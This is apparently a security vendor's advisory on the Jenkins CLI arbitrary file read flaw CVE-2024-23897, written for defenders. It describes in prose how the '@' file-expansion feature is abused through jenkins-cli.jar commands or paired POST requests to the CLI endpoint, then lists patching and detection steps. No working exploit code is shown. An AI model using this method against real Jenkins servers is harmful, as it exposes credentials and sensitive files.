Vulnerability report written by the TA team by analyzing "Jenkins Arbitrary File Leak Vulnerability (CVE-2024-23897)"
This vulnerability, identified in Jenkins' built-in command line interface (CLI) and its interaction with the args4j library, allows attackers to exploit the ability to substitute the file contents for the "@" character after a file path in command arguments. Unfortunately, this feature opens the door to unauthorized file access in the Jenkins controller file system, posing a significant risk to the integrity and confidentiality of sensitive information.
Importantly, Jenkins versions 2.441 and earlier and LTS 2.426.2 are affected, making a wide range of installations susceptible to exploitation. This vulnerability is particularly concerning given the potential for attackers to gain access with minimal privileges and, in certain configurations, without authentication. The severity of the situation is further emphasized by the fact that publicly exposed Jenkins instances can be easily identified and exploited, a common practice in organizations around the world.
In response to these serious vulnerabilities, organizations should quickly assess their Jenkins deployments and take the necessary steps to protect their environments from potential exploits.
1. Overview
Jenkins is a popular open source automation server for pipelines that combine continuous integration and deployment (CI/CD). It provides programmers with a platform to automate the development, testing, and deployment of software projects.
Source: https://www.linkedin.com/pulse/you-aware-recent-jenkins-vulnerability-cve-2024-23897-amit-dash-lgi6e
Among the many vulnerabilities found in these servers, we've summarized our analysis of the recently announced CVE-2024-23897.
2. Attack types
Jenkins comes with an integrated command line interface (CLI) that enables interaction from a script or shell environment. The CLI leverages the args4j library to parse command arguments and parameters from the Jenkins controller during CLI command processing.
One feature of args4j replaces the contents of a file by appending the "@" character after the file path, which was originally designed to improve usability, but has turned into a serious security vulnerability. Version 2.441 and LTS 2.426.2 enable this feature by default and do not check it. By exploiting this flaw, an attacker can access any file on the file system using the default character encoding of the Jenkins controller process. In the Jenkins CLI tool, arguments prefixed with "@" are misinterpreted as files that need to be opened to access the argument. In some situations, CLI users accidentally receive lines from these files in error messages.
Source: https://hackyboiz.github.io/2024/03/04/ogu123/cve-2024-23897/
This allows an attacker to read arbitrary files from the Jenkins controller file system using the default character encoding of the Jenkins controller process.
There are two ways to exploit this vulnerability.
2-1. Using Jenkins-cli.jar
A common approach involves leveraging the Jenkins-cli.jar, which operates over web sockets or SSH. Specifically, commands such as shutdown, enable-job, help, and connect-node in the Jenkins CLI tool are manipulated to illegally access and read the contents of files on the Jenkins server. The figure below shows the help command being executed in the Jenkins CLI to read a file.
Source: https://www.uptycs.com/blog/jenkins-exploit-cve-2024-23897
The image below is a verbatim example of the contents of a file being read from the Jenkins server.
2-2. Send a POST request
Another method is to send two POST requests from 'http://jenkins/cli?remoting=false'. This technique requires the use of a downloader and an uploader. The downloader fetches the response of the CLI command, and the uploader executes the specified CLI command provided in the body of the request. The connection between the downloader and uploader is established utilizing the UUID in the session header.
3. What to do
There are generally two ways to respond to the Jenkins Arbitrary File Leak Vulnerability (CVE-2024-23897).
- Disable access to the Jenkins CLI
- Latest update to Jenkins version 2.442 and LTS 2.426.3. This patch disables the command parser feature responsible for the vulnerability
Our AIWAF product is detecting attack syntax that exploits this vulnerability with the pattern "Arbitrary file read in Jenkins".
4. Conclusion
CVE-2024-23897 highlights a critical vulnerability within Jenkins that highlights the ongoing challenge of securing software automation environments. The vulnerability allows an attacker to exploit CLI argument handling to read arbitrary files from the Jenkins server, posing a significant security risk. The ability to manipulate CLI arguments to include the contents of arbitrary files could lead to unauthorized exposure of sensitive data, compromising the security of the Jenkins server and the broader infrastructure it manages.
The discovery of this vulnerability is a reminder of the importance of diligent security practices in the development and maintenance of automation tools like Jenkins. Organizations using Jenkins for their CI/CD pipelines should prioritize the assessment and remediation of their deployments to protect against potential exploits.
We have developed a number of patterns for Jenkins server-related vulnerabilities in our AIWAF product and will continue to respond quickly to additional Jenkins server-related vulnerabilities as they are discovered.
5. References
- https://www.uptycs.com/blog/jenkins-exploit-cve-2024-23897
- https://ko.securecodewarrior.com/article/deep-dive-up-close-and-personal-with-the-moveit-zero-day-vulnerability
- https://hackyboiz.github.io/2024/03/04/ogu123/cve-2024-23897/
- https://www.enciphers.com/exploiting-cve/in-the-crosshairs-understanding-cve-2024-23897s-technical-implications?491f42f9_page=5&491f4314_page=2&6cf8b8b6_page=5